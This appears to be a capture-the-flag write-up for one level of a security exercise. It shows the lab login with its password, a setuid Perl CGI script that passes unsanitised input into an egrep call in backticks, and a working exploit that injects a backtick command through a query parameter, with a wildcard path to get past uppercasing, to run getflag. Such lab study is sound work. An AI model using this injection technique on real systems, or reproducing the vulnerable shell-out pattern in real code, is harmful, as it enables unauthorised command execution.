12

tags: Perl backtick injection egrep

Login

> ssh level12@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password: fa6v5ateaw21peobuub8ipe6s

> ls -l level12.pl 
-rwsr-sr-x+ 1 flag12 level12 464 level12.pl

See more

> cat level12.pl 
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];         👈 
  $xx =~ tr/a-z/A-Z/;  👈 
  $xx =~ s/\s.*//;

  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  👆 backticks in Perl will run the Bash cmd 
  👆  if xx is also in backticks it also gets expanded/exec
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
      👆 nn is empty bc. arg 1 is empty so ($s =~ "") is always true 
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }    
}

n(t(param("x"), param("y"))); 👈 query's key: x, y

• input (x) is not sanitized before inserted in the cmd
• "" - PERL interpolates/evals variables inside double quotes
• egrep - PERL runs this unsanitized cmd as part of egrep
• since /tmp/go has x|777 getflag will be run

> echo "getflag | wall" > /tmp/GO
> chmod 777 /tmp/GO
> curl 'http://10.0.2.15:4646?x=`/*/GO`'

there you have it in tmp tmp